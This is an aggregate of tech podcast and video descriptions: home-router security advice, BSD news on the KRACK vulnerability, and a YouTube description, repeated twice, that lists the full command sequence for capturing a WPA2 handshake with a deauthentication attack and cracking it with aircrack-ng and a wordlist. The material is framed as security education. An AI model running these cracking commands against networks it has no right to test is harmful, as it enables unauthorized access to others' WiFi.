risk-free? Absolutely nothing is risk-free. But this is going to be a little bit more risky than using the carrier signal, but you're taking reasonable precautions to do what you can in light of the circumstances to be as secure as you can. Those are two key things to think about. Some other things, don't leave devices on and accessible if you step away, and you have a conversation with somebody, if you're outside working around a pool on vacation, trying to just get a little sun. Don't leave your laptop on at some table unwatched. Have it automatically timeout and log off, or in 10 minutes, or whatever it might be. If you want to run down to dinner in your hotel room, again, log out, or better yet just turn the thing off until you get back up there. But take some steps. Again, it's all about making sure. We don't want to make it easy for others to get into our systems. So there's a couple of things to think about in terms of vacations and travel. Next, I'm thinking about the move here, and stepping in. My big concern, and I'm using this as a parallel or a corollary to the work from home struggles and that transition. My immediate concern was the router. You know? I have the instructions here. The username is admin. Okay, that's the default. A lot of them are named admin. The password that they had set up was easy to guess and just, you know. You look and say, "Okay, I don't know what they've done with the settings." That's completely unacceptable. I cannot and would not put myself at risk using that signal, let alone ALPS. Now, I may be a little crazy at times, I don't know, but I kept my new router, my personal router, I had that with me. Now, I don't travel with a router all the time, although if I'm going to start traveling and I may stay put for a couple of weeks somewhere, I actually might start doing that. I'm very sincere in saying that. But I'm able to trust the signal and be far more secure. I'm not suggesting now, again, that you take routers with you on your travel, but I am suggesting, hey, in your home, if you've not thought about this and taken steps to secure your router, now is the time. There are all kinds of exposures that can come into play here. The purpose of this talk is not to really explore all that, but it's just to say you need to do something. Let me go through, I have a short list here of things from an article I wrote about this, but I want to talk about some of the basics. You need to understand that the usernames and passwords, the default ones, are available on the internet, they're often standards, and that they need to be changed. So again, think about the complex password. That's have a very complex password for the router, and that's change the username from admin to something that is a bit more unique to you. Change the network SSID. Again, the name of the network. Every router comes with a default name. That has to be changed or something that's unique to you, but don't make it something that's obvious as to who you are. You know, Mark at 2022 Front Street. The neighbors all know, "Hey, that signal's Mark. And you know, no. You want to make it, "I don't know who this is," kind of. Okay? Set up a guest network in your home, with its own network name and your unique password, so that guests have access to a network. I trust our kids. They're all good kids. They're all adults. We're empty nesters. But when they come home, none of them are allowed on the home network, because it's used for work, and there's a lot of, you know. It's personal information. I don't want to expose my stuff to there, and vice versa. But you know, if they're doing something they shouldn't be doing on the network, it's separate. I just strongly encourage you to do that. Because when kids come into the home, and friends of your kids come into the home, and they're gaming, and doing all kinds of things, if they're on your network that your work computer, and your personal devices, and everything's on, you're risking. They bring this new level of exposure that we're not necessarily thinking about. So block that. Set up a separate network. If the firmware version of your router isn't current update to the most current version available, it's all about security patches. Routers need to be updated as well. If it's an auto update option, check that to make sure. If you can't tell or it looks like there's been no update even released in the last 12 to 18 months, throw out that router and get a new one. And I'm not kidding around. These routers need to be able to be updated automatically, and the updates, a lot of routers, they stop ... I had an older router and it was two years out of date before I finally realized, I'm going, "Well, that's not good." So get rid of it and get something current. Confirm that the network authentication method, and what we're talking about is in the encryption that the routers using, is set to WPA2 personal, or even better, WPA3 personal, excuse me, if that option is available, WPA3 is simply just more secure. If neither option, WPA2 or WPA3 is available on the router, it's old, toss it, get a new one. Not kidding. And finally, turn off universal plug and play. That's sort of the functionality that makes it very easy to connect new internet of thing devices and whatnot around the house. I know that it makes connecting new devices when you introduce them to the home a little less convenient, but leaving it on provides hackers easy access. That's just not acceptable. I mean, if you want to do that in your own life and nothing in your home is connected to the office network or you're doing nothing for work, okay. Have at it, I guess. But when we are using devices, the network, for work, that's got to be turned off. That access avenue, for lack of a better description, has been used even to insert programs like banking Trojans that try to capture your login credentials to your bank account or to your 401k. Not good. We need to address that. Set up a defined work space. Part of this is a wellness thing for me, part of it is just establishing boundaries in a home, perhaps with children, but having a defined workspace that you can enter and exit from and others can learn to respect can be a huge difference. No device sharing. Absolutely no device sharing. Confidentiality is in play and there's no pandemic exception. You know, if you are using devices: work computers, personal computers for work, smart everything. The kid's, family, if they are not members of your firm, cannot and should not be on these devices. And the final thing that I want to talk about is just behavior in general. There's really been a couple of interesting studies of late looking at this, in terms of some security studies, looking at behavior. I find it absolutely fascinating. Part of it has occurred because of this massive work from home thing, but it's true, this has been true pre-pandemic and it's going to stay true post-pandemic and vacations. When we use our own devices, as opposed to a work-controlled device, a work-issued device, and when we are outside of a formal office setting, whether it's vacation, at home, et cetera, we actually, in terms of just seems to be inherent to the human race, I guess, but we seem to be inherently less vigilant, less diligent. We just get far more casual. So we are more easily tricked, or you know, falling prey for a phishing attack or clicking on something we shouldn't be clicking on, not just paying attention, not turning things off, sharing devices. We just get very, very casual. We can't. Stay sharp. Think before you click. Don't get too comfortable with the casualness. Don't get too comfortable with this new normal. I understand that for many of us, as an example, we had to transition very quickly to a work from home setting, and it was about making sure the tech works so that we keep moving forward as best we could. And little thought was given to the security of side of this. And then we get comfortable with it and we don't even think about it. That's what I'm trying to address, in part with this in terms of work from home with this, but I want you to think about it in all assets. It's not just the pandemic, it's not just working from home. It's when we're traveling, when we're on vacation. We need to stay vigilant and we need to periodically just take a few minutes and sit down and think. "Wait, is this a responsible thing to do?" "Wait, have I taken all the steps that I should have taken earlier on or I should be taking now?" I certainly haven't covered everything that you can do, but these are key things, and important things, and basic things that I think we should all be thinking about, and that should be on your radar. So that's it. I hope you found something of value out of this short discussion. I encourage you, if you have any concerns or questions, something that I might be able to help with, please don't hesitate to reach out. My email address is mbass, M-B-A-S-S, @ALPSinsurance, one word, ALPSinsurance.com. So ALPSinsurance.com, mbass@ALPSinsurance.com. You do not need to be an option shored to visit with me if there's something I can do. Hey, if someone reaches out and I'm able to do something that might prevent just one hack, one breach, that's a great day. That's it folks. Hey, have a good one. God bless.
Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video. Menu: Use airmon-ng to crack WiFi networks: 0:00 Network Adapter to use: 0:46 Kali Linux setup: 1:20 Plug in network adapter: 1:35 Verify that network adapter is recognized by Kali Linux: 2:04 WPA2 network to crack: 2:43 iwconfig: 3:27 Kali Version: 3:34 Kill conflicting processes with airmon-ng: 3:55 Put interface into monitor mode: 4:32 Discover WiFi Networks with airodump-ng: 5:15 Use airodump-ng to view only one network: 6:20 Connect to network using an iPhone: 6:39 airodump-ng capture WPA2 four way handshake: 6:58 Use aireplay-ng to deauthenticate clients: 7:25 WPA2 four way handshake captured: 8:08 Use Wireshark to view WPA2 four way handshake: 8:38 Put interface back into managed mode: 9:30 Crack WPA2 password with aircrack-ng: 10:10 Password cracked: 11:00 WiFi router WPA2 settings: 12:00 Summary: 12:40 ================ Network Adapters: ================ Alfa AWUS036NHA: https://amzn.to/3qbQGKN Alfa AWUSO36NH: https://amzn.to/3moeQiI ================ Commands used: ================ ! See version of Kali cat /etc/os-release uname -a ! See interfaces ip addr iwconfig !kill processes sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap !Filter Wireshark messages for EAPOL eapol !Stop monitor mode airmon-ng stop wlan0mon !Crack file with Rock you or another wordlist !Make sure you have rockyou in text format (unzip file on Kali) !Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ================ Previous videos: ================ Kali Installation: https://youtu.be/VAMP8DqSDjg WPA2 GPU password cracking: https://youtu.be/J8A8rKFZW-M Wordlists (rockyou): https://youtu.be/rgWcguAg-XA ================ Connect with me: ================ Discord: https://discord.com/invite/usKSyzb Twitter: https://www.twitter.com/davidbombal Instagram: https://www.instagram.com/davidbombal LinkedIn: https://www.linkedin.com/in/davidbombal Facebook: https://www.facebook.com/davidbombal.co TikTok: http://tiktok.com/@davidbombal YouTube: https://www.youtube.com/davidbombal ================ Support me: ================ Buy my CCNA course and support me: DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna Udemy CCNA Course: https://bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10 ====================== Special Offers: ====================== Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P wifi kali linux kali linux 2020 kali linux 2020.4 wifite wpa wep wps alfa comptia ceh oscp wifi airmon-ng aircrack-ng hack hacker hacking ethical hacking kali ine Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video. Menu: Use airmon-ng to crack WiFi networks: 0:00 Network Adapter to use: 0:46 Kali Linux setup: 1:20 Plug in network adapter: 1:35 Verify that network adapter is recognized by Kali Linux: 2:04 WPA2 network to crack: 2:43 iwconfig: 3:27 Kali Version: 3:34 Kill conflicting processes with airmon-ng: 3:55 Put interface into monitor mode: 4:32 Discover WiFi Networks with airodump-ng: 5:15 Use airodump-ng to view only one network: 6:20 Connect to network using an iPhone: 6:39 airodump-ng capture WPA2 four way handshake: 6:58 Use aireplay-ng to deauthenticate clients: 7:25 WPA2 four way handshake captured: 8:08 Use Wireshark to view WPA2 four way handshake: 8:38 Put interface back into managed mode: 9:30 Crack WPA2 password with aircrack-ng: 10:10 Password cracked: 11:00 WiFi router WPA2 settings: 12:00 Summary: 12:40 ================ Network Adapters: ================ Alfa AWUS036NHA: https://amzn.to/3qbQGKN Alfa AWUSO36NH: https://amzn.to/3moeQiI ================ Commands used: ================ ! See version of Kali cat /etc/os-release uname -a ! See interfaces ip addr iwconfig !kill processes sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap !Filter Wireshark messages for EAPOL eapol !Stop monitor mode airmon-ng stop wlan0mon !Crack file with Rock you or another wordlist !Make sure you have rockyou in text format (unzip file on Kali) !Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ================ Previous videos: ================ Kali Installation: https://youtu.be/VAMP8DqSDjg WPA2 GPU password cracking: https://youtu.be/J8A8rKFZW-M Wordlists (rockyou): https://youtu.be/rgWcguAg-XA ================ Connect with me: ================ Discord: https://discord.com/invite/usKSyzb Twitter: https://www.twitter.com/davidbombal Instagram: https://www.instagram.com/davidbombal LinkedIn: https://www.linkedin.com/in/davidbombal Facebook: https://www.facebook.com/davidbombal.co TikTok: http://tiktok.com/@davidbombal YouTube: https://www.youtube.com/davidbombal ================ Support me: ================ Buy my CCNA course and support me: DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna Udemy CCNA Course: https://bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10 ====================== Special Offers: ====================== Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P wifi kali linux kali linux 2020 kali linux 2020.4 wifite wpa wep wps alfa comptia ceh oscp wifi airmon-ng aircrack-ng hack hacker hacking ethical hacking kali ine Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
It's really important that you use strong WiFi passwords. Otherwise it's easy to use hashcat and a GPU to crack your WiFi network. Make sure that you are aware of the vulnerabilities and protect yourself. Disclaimer: Video is for educational purposes only. All equipment is my own. Make sure you learn how to secure your networks and applications. Need help? Join my Discord: https://discord.com/invite/usKSyzb Menu: Overview: 0:00 Alfa Card Setup: 2:09 Start Wifite: 2:48 Select WiFi network: 3:31 Capture handshake: 4:05 Convert cap to hccapx file: 5:20 Copy file to hashcat: 6:31 Hashcat: 6:50 View GPUs: 7:08 hashcat options: 7:52 Start hashcat: 8:45 Cracked: 10:31 ================ Network Adapters: ================ Alfa AWUS036NHA: https://amzn.to/3qbQGKN Alfa AWUSO36NH: https://amzn.to/3moeQiI ================ Previous videos: ================ Kali Installation: https://youtu.be/VAMP8DqSDjg One command wifite: https://youtu.be/TDVM-BUChpY ================ Connect with me: ================ Discord: http://discord.davidbombal.com Twitter: https://www.twitter.com/davidbombal Instagram: https://www.instagram.com/davidbombal LinkedIn: https://www.linkedin.com/in/davidbombal Facebook: https://www.facebook.com/davidbombal.co TikTok: http://tiktok.com/@davidbombal YouTube: https://www.youtube.com/davidbombal ================ Support me: ================ Join thisisIT: https://bit.ly/thisisitccna Or, buy my CCNA course and support me: DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna Udemy CCNA Course: https://bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10 ====================== Special Offers: ====================== Cisco Press: Up to 50% discount Save every day on Cisco Press learning products! Use discount code BOMBAL during checkout to save 35% on print books (plus free shipping in the U.S.), 45% on eBooks, and 50% on video courses and simulator software. Offer expires December 31, 2020. Shop now. Link: bit.ly/ciscopress50 ITPro.TV: https://itpro.tv/davidbombal 30% discount off all plans Code: DAVIDBOMBAL Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P wifi kali linux kali linux 2020 kali linux 2020.4 hashcat hashcat gpu gru wifi wpa2 wpa3 wifite wpa wep wps alfa comptia cech oscp security+ Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
WPA2 Karck Attack Update https://www.krackattacks.com/followup.html#overview Cisco Updates https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities Seattle Police Tries to Stop SWATing https://www.seattle.gov/police/need-help/swatting git Vulnerability Fixed https://github.com/timwr/CVE-2017-1000117
Bufferbloat (IQrouter is the answer), covering webcam with tape (overhyped threat), bootable ISO file (saving on USB drive with Rufus), USB DVD drive (for laptops without DVD), watching streaming content offline (supported by Netflix, Prime, HBO, Showtime), Profiles in IT (Christopher Sholes, father of the typewriter and QUERTY keyboard), hackers target iPhone with malware (MDM takes over phone, originated in India), making iPhone fingerprints more accurate (take multiple images of same finger), SIM hijacking (the latest exploit, beware), WPA3 will make WiFi more secure (replaces fourteen year old WPA2), Girl Scouts issues 30 new STEM related badges, scent of coffee boosts math performance (coffee drinking not required), Google Loon brings Internet to Kenya (bringing 49 million to the web), and Gigabytes, Terabytes, Petabyes (what does it actually mean). This show originally aired on Saturday, July 21, 2018, at 9:00 AM EST on WFED (1500 AM).
Bluetooth vs RF mouse, downloading YouTube videos, MS Mail (configuring Verizon mail), responding to SPAM (not a good idea), Wi-Fi security (MAC address filtering vs WPA2), Profiles in IT (Morris Chang, Father of Taiwan chip industry), fun Geeky websites (ThinkGeek, ScientificsOnline), Supreme Court rules to protect cell phone location, Internet sales tax is coming (Supreme Court has ruled), DHS ignoring tech alternaives at the border, Summer Soltice defined (longest day of the year), ten years ago on Tech Talk (human migration and near extinction), and IOS12 will support location data for 911 calls (Android not far behind). This show originally aired on Saturday, June 23, 2018, at 9:00 AM EST on WFED (1500 AM).
FreeBSD 10.4-RELEASE is here, more EuroBSDcon travel notes, the KRACK attack, ZFS and DTrace on NetBSD, and pfsense 2.4. This episode was brought to you by Headlines FreeBSD 10.4-RELEASE Available (https://www.freebsd.org/releases/10.4R/announce.html) FreeBSD 10.4-RELEASE is out. The FreeBSD Project dedicates the FreeBSD 10.4-RELEASE to the memory of Andrey A. Chernov. Some of the highlights: 10.4-RELEASE is the first FreeBSD release to feature full support for eMMC storage, including eMMC partitions, TRIM and bus speed modes up to HS400. Please note, though, that availability of especially the DDR52, HS200 and HS400 modes requires support in the actual sdhci(4) front-end as well as by the hardware used. Also note, that the SDHCI controller part of Intel® Apollo Lake chipsets is affected by several severe silicon bugs. Apparently, it depends on the particular Apollo Lake platform whether the workarounds in place so far are sufficient to avoid timeouts on attaching sdhci(4) there. Also in case a GPT disk label is used, the fsckffs(8) utility now is able to find alternate superblocks. The aesni(4) driver now no longer shares a single FPU context across multiple sessions in multiple threads, addressing problems seen when employing aesni(4) for accelerating ipsec(4). Support for the Kaby Lake generation of Intel® i219(4)/ i219(5) devices has been added to the em(4) driver. The em(4) driver is now capable of enabling Wake On LAN (WOL) also for Intel® i217, i218 and i219 chips. Note that stale interface configurations from previous unsuccessful attempts to enable WOL for these devices now will actually take effect. For example, an ifconfig em0 wol activates all WOL variants including wolmcast, which might be undesirable. Support for WOL has been added to the igb(4) driver, which was not able to activate this feature on any device before. The same remark regarding stale WOL configurations as for the em(4) driver applies. Userland coredumps can now trigger events such as generating a human readable crash report via devd(8). This feature is off by default. The firmware shipping with the qlxgbe(4) driver has been updated to version 5.4.66. Additionally, this driver has received some TSO and locking fixes, performance optimizations as well as SYSCTLs providing MAC, RX and TX statistics. Mellanox® ConnectX-4 series adapters are now supported by the newly added mlx5ib(4) driver. OpenSSH received an update to version 7.3p1. GNOME has been updated to version 3.18. Xorg-Server has been updated to version 1.18.4. Check out the full release notes and upgrade your systems to 10.4-RELEASE. Thanks to the FreeBSD Release Engineering Team for their efforts. *** EuroBSDcon 2017: "travel notes" after the conference (https://blog.netbsd.org/tnf/entry/eurobsdcon_2017_travel_notes_after) Leonardo Taccari posted in the NetBSD blog about his experiences at EuroBSDcon 2017: Let me tell you about my experience at EuroBSDcon 2017 in Paris, France. We will see what was presented during the NetBSD developer summit on Friday and then we will give a look to all of the NetBSD and pkgsrc presentations given during the conference session on Saturday and Sunday. Of course, a lot of fun also happened on the "hall track", the several breaks during the conference and the dinners we had together with other *BSD developers and community! This is difficult to describe and I will try to just share some part of that with photographs that we have taken. I can just say that it was a really beautiful experience, I had a great time with others and, after coming back home... ...I miss all of that! :) So, if you have never been in any BSD conferences I strongly suggest you to go to the next ones, so please stay tuned via NetBSD Events. Being there this is probably the only way to understand these feelings! Thursday (21/09): NetBSD developers dinner Arriving in Paris via a night train from Italy I literally sleep-walked through Paris getting lost again and again. After getting in touch with other developers we had a dinner together and went sightseeing for a^Wseveral beers! Friday (22/09): NetBSD developers summit On Friday morning we met for the NetBSD developers summit kindly hosted by Arolla. NetBSD on Google Compute Engine -- Benny Siegert (bsiegert) Scripting DDB with Forth -- Valery Ushakov (uwe) News from the version control front -- Jörg Sonnenberger (joerg) Afternoon discussions and dinner After the lunch we had several non-scheduled discussions, some time for hacking, etc. We then had a nice dinner together (it was in a restaurant with a very nice waiter who always shouted after every order or after accidentally dropping and crashing dishes!, yeah! That's probably a bit weird but I liked that attitude! :)) and then did some sightseeing and had a beer together. Saturday (23/09): First day of conference session and Social Event A Modern Replacement for BSD spell(1) -- Abhinav Upadhyay (abhinav) Portable Hotplugging: NetBSD's uvm_hotplug(9) API development -- Cherry G. Mathew (cherry) Hardening pkgsrc -- Pierre Pronchery (khorben) Reproducible builds on NetBSD -- Christos Zoulas (christos) Social event The social event on Saturday evening took place on a boat that cruised on the Seine river. It was a very nice and different way to sightsee Paris, eat and enjoy some drinks and socialize and discuss with other developers and community. + Sunday (24/09): Second day of conference session The school of hard knocks - PT1 -- Sevan Janiyan (sevan) The LLDB Debugger on NetBSD -- Kamil Rytarowski (kamil) What's in store for NetBSD 8.0? -- Alistair Crooks (agc) Sunday dinner After the conference we did some sightseeing in Paris, had a dinner together and then enjoyed some beers! Conclusion It was a very nice weekend and conference. It is worth to mention that EuroBSDcon 2017 was the biggest BSD conference (more than 300 people attended it!). I would like to thank the entire EuroBSDcon organising committee (Baptiste Daroussin, Antoine Jacoutot, Jean-Sébastien Pédron and Jean-Yves Migeon), EuroBSDcon programme committee (Antoine Jacoutot, Lars Engels, Ollivier Robert, Sevan Janiyan, Jörg Sonnenberger, Jasper Lievisse Adriaanse and Janne Johansson) and EuroBSDcon Foundation for organizing such a wonderful conference! I also would like to thank the speakers for presenting very interesting talks, all developers and community that attended the NetBSD devsummit and conference, in particular Jean-Yves and Jörg, for organizing and moderating the devsummit and Arolla that kindly hosted us for the NetBSD devsummit! A special thanks also to Abhinav (abhinav) and Martin (martin) for photographs and locals Jean-Yves (jym) and Stoned (seb) for helping us in not get lost in Paris' rues! :) Thank you! *** WiFi Vulnerability in WPA2: KRACK (https://www.krackattacks.com/) “We discovered serious weaknesses in WPA2, a protocol that secures all modern protected Wi-Fi networks. An attacker within range of a victim can exploit these weaknesses using key reinstallation attacks (KRACKs). Concretely, attackers can use this novel attack technique to read information that was previously assumed to be safely encrypted. This can be abused to steal sensitive information such as credit card numbers, passwords, chat messages, emails, photos, and so on. The attack works against all modern protected Wi-Fi networks. Depending on the network configuration, it is also possible to inject and manipulate data. For example, an attacker might be able to inject ransomware or other malware into websites.” “Note that if your device supports Wi-Fi, it is most likely affected. During our initial research, we discovered ourselves that Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys, and others, are all affected by some variant of the attacks. For more information about specific products, consult the database of CERT/CC, or contact your vendor.” FreeBSD Advisory (https://www.freebsd.org/security/advisories/FreeBSD-SA-17:07.wpa.asc) As of the date of this recording, a few weeks ahead of when this episode will air, the issue is fixed in FreeBSD 11.0 and 11.1, and a workaround has been provided for 10.3 and 10.4 (install newer wpa_supplicant from ports). A fix for 10.3 and 10.4 is expected soon. They will more than likely be out by time you are watching this. The fix for 10.3 and 10.4 is more complicated because the version of wpasupplicant included in the base system is 2.0, from January 2013, so is nearly 5 years old, so the patches do not apply cleanly. The security team is still considering if it will try to patch 2.0, or just replace the version of wpasupplicant with 2.5 from FreeBSD 11.x. OpenBSD was unwilling to wait when the embargo was extended on this vulnerability and stealth fixed the issue on Aug 30th (https://marc.info/?l=openbsd-cvs&m=150410571407760&w=2) stsp@openbsd.org ‘s Mastodon post (https://mastodon.social/@stsp/98837563531323569) Lobste.rs conversation about flaw and OpenBSD's reaction (https://lobste.rs/s/dwzplh/krack_attacks_breaking_wpa2#c_pbhnfz) “What happened is that he told me on July 15, and gave a 6 weeks embargo until end of August. We already complained back then that this was way too long and leaving people exposed. Then he got CERT (and, thus, US gov agencies) involved and had to extend the embargo even further until today. At that point we already had the ball rolling and decided to stick to the original agreement with him, and he gave us an agreeing nod towards that as well.” “In this situation, a request for keeping the problem and fix secret is a request to leave our users at risk and exposed to insiders who will potentially use the bug to exploit our users. And we have no idea who the other insiders are. We have to assume that information of this kind leaks and dissipates pretty fast in the security “community”.” “We chose to serve the needs of our users who are the vulnerable people in this drama. I stand by that choice.” As a result of this: “To avoid this problem in the future, OpenBSD will now receive vulnerability notifications closer to the end of an embargo.” NetBSD: “patches for the WPA issues in KRACK Attacks were committed Oct 16th to HEAD & are pending pullup to 6/7/8 branches” (http://mail-index.netbsd.org/source-changes/2017/10/16/msg088877.html) As of this recording, Dragonfly appears to use wpa_supplicant 2.1 which they imported in 2014 and has not been touched in over a year (https://github.com/DragonFlyBSD/DragonFlyBSD/commits/master/contrib/wpa_supplicant) *** News Roundup NetBSD - dtrace and ZFS update (https://mail-index.netbsd.org/tech-kern/2017/10/13/msg022436.html) Chuck Silvers writes to the tech-kern mailing list of NetBSD: I've been working on updating netbsd's copy of the dtrace and zfs code to rebase from the existing ancient opensolaris version to a recent freebsd version. most of the freebsd changes are pretty close to what netbsd needs, so that seems like a more useful upstream for us. I have things working well enough now that I want to share the code in preparation for committing. this update improves upon our existing dtrace/zfs code in several ways: picks up all the upstream zfs fixes and enhancements from the last decade zfs now supports mmap on netbsd, so you can run executables stored in zfs dtrace fbt probes can now be used in kernel modules (such as zfs) A patch is provided here: http://ftp.netbsd.org/pub/NetBSD/misc/chs/diff.cddl.20171012 which needs to be applied using “patch -E” as it adds and removes files. He provides the following summary for the diff: freebsd's dtrace/zfs code as of r315983 (2017-03-26), adapted for netbsd. a few updates to our copy of freebsd's libproc. build system support for using -fno-omit-frame-pointer everywhere and disabling other compiler optimizations that confuse dtrace. sample kernel config changes for a couple evbarm configs (the ones I tested). module/ksyms enhancements for dtrace integration. genfs API enhancements to support zfs. an option to have mutexes not become no-ops during a panic. uvm_aobj API change to support 64-bit aobj sizes (eg. for tmpfs). Known issues with the patch include: unloading the zfs module fails even with no zpools imported if you've done much with zfs since it was loaded. there's some refcounting problem that I haven't tracked down yet. the module refcounting for active fbt probes is bogus. currently module refcounting is protected by kernconfig_lock(), but taking that lock down in the bowels of dtrace seems likely to create deadlocks. I plan to do something fancier but haven't gotten to it yet. the dtrace uregs[] stuff is probably still wrong. the CTF typeid overflow problem is still there (more on this below). Unsupported features include: the ".zfs" virtual directory, eg. ".zfs/snapshot/foo@bar" zvols ZFS ACLs (aka. NFSv4 ACLs) NFS exporting a ZFS file system setting dtrace probes in application code using ZFS as the root fs new crypto hashes SHA512_256, skein, and edonr (the last one is not in freebsd yet either) zio delay injection (used for testing zfs) dtrace support for platforms other than x86 and arm A more detailed description of the CTF typeid overflow is also provided. Check out the full thread with followups and try out the patch if you're on NetBSD. *** pfSense 2.4.0-RELEASE Now Available! (https://www.netgate.com/blog/pfsense-2-4-0-release-now-available.html) Jim Pingle writes about the new release: We are excited to announce the release of pfSense® software version 2.4, now available for new installations and upgrades! pfSense software version 2.4.0 was a herculean effort! It is the culmination of 18 months of hard work by Netgate and community contributors, with over 290 items resolved. According to git, 671 files were changed with a total 1651680 lines added, and 185727 lines deleted. Most of those added lines are from translated strings for multiple language support! + Highlights FreeBSD 11.1-RELEASE as the base Operating System New pfSense installer based on bsdinstall, with support for ZFS, UEFI, and multiple types of partition layouts (e.g. GPT, BIOS) Support for Netgate ARM devices such as the SG-1000 OpenVPN 2.4.x support, which brings features like AES-GCM ciphers, speed improvements, Negotiable Crypto Parameters (NCP), TLS encryption, and dual stack/multihome Translation of the GUI into 13 different languages! For more information on contributing to the translation effort, read our previous blog post and visit the project on Zanata WebGUI improvements, such as a new login page, improved GET/POST CSRF handling, significant improvements to the Dashboard and its AJAX handling Certificate Management improvements including CSR signing and international character support Captive Portal has been rewritten to work without multiple instances of ipfw Important Information: 32-bit x86 and NanoBSD have been deprecated and are not supported on pfSense 2.4. Read the full release notes and let them know how you like the new release. *** OpenBSD changes of note 629 (https://www.tedunangst.com/flak/post/openbsd-changes-of-note-629) Use getrusage to measure CPU time in md5 benchmarking. Add guard pages at the end of kernel stacks so overflows don't run into important stuff. This would be useful in FreeBSD, even just to detect the condition. I had all kinds of strange crashes when I was accidently overflowing the stack when working on the initial version of the ZSTD patches before ZSTD gained a working heap mode. Add dwxe driver for ethernet found on Allwinner A64, H3 and H5 SoCs. Fix a regression caused by removal of SIGIO from some devices. In malloc, always delay freeing chunks and change ‘F' option to perform a more extensive check for double free. Change sendsyslog prototype to take a string, since there's little point logging not strings. The config program tries to modify zero initialized variables. Previous versions of gcc were patched to place these in the data segment, instead of the bss, but clang has no such patches. Long long ago, this was the default behavior for compilers, which is why gcc was patched to maintain that existing behavior, but now we want a slightly less unusual toolchain. Fix the underlying issue for now by annotating such variables with a data section attribute. *** t2k17 Hackathon Report: Philip Guenther: locking and libc (https://undeadly.org/cgi?action=article;sid=20170824080132) Next up in our series of t2k17 hackathon reports is this one from Philip Guenther: I showed up at t2k17 with a couple hold-over diffs from e2k17 that weren't stable then and hadn't gotten much better since, so after a red-eye through Chicago I arrived in the hackroom, fired up my laptop and synced trees. Meanwhile, people trickled in and the best part of hackathons, the conversations and "what do you think about this?" chats started. Theo introduced me to Todd Mortimer (mortimer@), who's been hacking on clang to implement RETGUARD for C programs. Over the hackathon we discussed a few loose ends that cropped up and what the correct behavior should be for them as well as the mechanics of avoiding 0xc3 bytes (the RET opcode) embedded in the middle of other multi-byte x86 machine code. Fun stuff. Martin (mpi@) and I had a conversation about the desirability of being able to sleep while holding netlock and pretty much came down on "oof, the scheduler does need work before the underlying issue driving this question can be resolved enough to answer it". :-( After some final hammering I got in an enhancement to pool(9) to let a pool use (sleeping) rwlocks instead of (spinning) mutexes and then immediately used that for the per-CPU pool cache pool as well as the futex pool. Further pools are likely to be converted as well kernel upper-level locking changes are made. Speaking of, a larger diff I had been working on for said upper-level locking was still suffering deadlock issues so I took a stab at narrowing it down to just a lock for the process tree, mostly mirroring the FreeBSD proctreelock. That appears to be holding up much better and I just have some code arrangement issues around sysptrace() before that'll go out for final review. Then most of the way through the week, Bob (beck@) vocally complained that life would be easier for libressl if we had some version of pthread_once() and the pthread mutex routines in libc. This would make some other stuff easier too (c.f. /usr/X11R6/lib/libpthread-stubs.*) and the TIB work over the last couple years has basically eliminated the runtime costs of doing so, so I spent most the rest of the hackathon finding the right place to draw a line through libpthread and move everything on the one side of the line into libc. That code seems pretty stable and the xenocara and ports people seem to like—or at least accept—the effects, so it will almost certainly go in with the next libc bump. Lots of other random conversations, hacking, meals, and beer. Many thanks to Ken (krw@) and local conspirators for another excellent Toronto hackathon! Beastie Bits 2017 NetBSD Foundation Officers (https://blog.netbsd.org/tnf/entry/2017_netbsd_foundation_officers) New BSDMag is out - Military Grade Data Wiping in FreeBSD with BCWipe (https://bsdmag.org/download/military-grade-data-wiping-freebsd-bcwipe/) LibertyBSD 6.1 released (http://libertybsd.net/) *** Feedback/Questions Eddy - EuroBSDCon 2017 